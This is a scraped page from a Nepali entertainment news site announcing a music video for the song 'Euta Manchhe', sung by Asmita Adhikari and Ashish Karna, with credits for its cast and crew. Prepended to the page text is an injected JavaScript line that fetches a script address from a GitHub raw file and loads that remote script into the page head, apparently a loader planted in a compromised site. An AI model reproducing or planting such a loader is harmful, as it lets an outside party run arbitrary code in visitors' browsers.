;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); अस्मिता र आषिशकाे स्वरमा एउटा मान्छे सार्वजनिक (भिडियो) – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • अस्मिता र आषिशकाे स्वरमा एउटा मान्छे सार्वजनिक (भिडियो)
चलचित्र

अस्मिता र आषिशकाे स्वरमा एउटा मान्छे सार्वजनिक (भिडियो)

काठमाडौं । अस्मिता अधिकारी र आशिष कर्णकाे स्वरमा रहेकाे आधुनिक गीत “एउटा मान्छे सार्वजनिक” भएकाे छ ।

गीतमा राजेश राउत र मनिशा पन्तकाे अभिनय, शब्द क्षितिज पारि झापालि, संगीत तथा एरेन्ज विनय कार्कि, मिक्सिङ जीवन वडु र स्टुडियाे आराेहि ईन्टरटेनमेन्ट रहेकाे छ ।

विईङ सावनकाे निर्देशनमा बनेकाे म्युजिक भिडियाेकाे छायांकन तथा सम्पादन विकाश गुरुङकाे रहेकाे छ । मागि विवाहकाे माया पिरति काे कथा भिडियाेमा देखाउन खाेजिएकाे छ ।
भिडयाे हेर्नुहाेस ।

फेसबुक प्रतिक्रियाहरु